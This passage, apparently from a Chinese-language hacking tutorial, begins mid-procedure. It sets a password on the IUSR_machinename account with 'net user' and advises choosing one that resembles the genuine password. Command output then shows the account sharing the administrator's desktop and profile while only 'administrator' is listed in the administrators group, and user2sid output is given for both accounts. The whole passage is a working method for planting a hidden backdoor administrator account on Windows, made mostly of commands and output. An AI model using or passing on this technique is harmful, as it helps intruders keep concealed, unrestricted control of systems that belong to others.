然后运行
net user iusr_machinename sometips
修改iusr_machinename的密码(最好使用14位的密码,越像iusr_machinename的密码越好)
ok,大功告成...
这样,我们拥有和默认管理员一样的桌面、一样的profile.....
而且,当我们运行 net localgroup administrators 时,看看结果:
c:\>net localgroup administrators
alias name administrators
comment administrators have complete and unrestricted access to the computer/domain
members
-------------------------------------------------------------------------------
administrator
the command completed successfully.
再看看user2sid的输出结果:
c:\>user2sid administrator
s-1-5-21-1004336348-1078145449-854245398-500
number of subauthorities is 5
domain is idontknow
length of sid in memory is 28 bytes
type of sid is sidtypeuser
c:\>user2sid iusr_machinename
s-1-5-21-1004336348-1078145449-854245398-1001
number of subauthorities is 5
domain is idontknow
length of sid in memory is 28 bytes
type of sid is sidtypeuser